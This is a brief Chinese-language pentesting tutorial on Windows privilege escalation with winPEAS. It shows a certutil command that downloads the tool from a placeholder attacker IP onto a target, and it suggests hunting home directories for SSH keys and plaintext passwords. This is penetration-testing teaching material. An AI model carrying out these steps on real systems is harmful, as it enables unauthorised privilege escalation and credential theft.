Windows 权限提升:自动化枚举
在渗透测试过程中,Windows 权限提升是获取系统控制权的关键步骤。自动化工具如 winPEAS 可以高效地收集系统信息,识别潜在的攻击面。
1. Windows 权限提升
1.1 枚举 Windows:自动化枚举
1.1.1 使用 winPEAS 进行自动化枚举
1.1.1.1 将 winPEAS 传输至目标主机
可以通过多种方式将工具上传到目标机器:
- 使用 SMB 共享挂载并复制文件。
- 利用 Python 搭建简易 HTTP 服务器下载。
- 通过 Base64 编码直接写入内存执行。
示例命令(Python HTTP Server):
python -m http.server 8000
在目标机上执行:
certutil -urlcache -split -f http://<攻击机 IP>:8000/winPEASany.exe .\winPEASany.exe
1.1.1.2 运行 winPEAS 程序
以当前用户权限运行即可开始扫描:
.
winPEASany.exe quiet
如需详细输出,可去掉 quiet 参数。
1.1.2 自动化枚举结果分析
1.1.2.1 基础系统信息
检查操作系统版本、补丁级别及架构。重点关注是否缺少关键安全更新。
1.1.2.2 历史记录信息
查看命令行历史、浏览器历史等,可能包含敏感凭据或访问过的内部地址。
1.1.2.3 Users 信息
列出本地用户账户,识别高权限账户(如 Administrator)或弱口令风险账户。
1.1.2.4 进程、服务、计划任务、网络信息和已安装应用程序的信息
- 进程:寻找以 SYSTEM 权限运行的非系统进程。
- 服务:检查服务二进制文件路径的可写性。
- 计划任务:查找配置不当的定时任务。
- 网络:监听端口及网络连接状态。
1.1.2.5 在用户的主目录中寻找可能的密码文件
搜索常见配置文件中的明文密码,如 .ssh 目录下的私钥、数据库配置文件、Web 应用配置文件等。


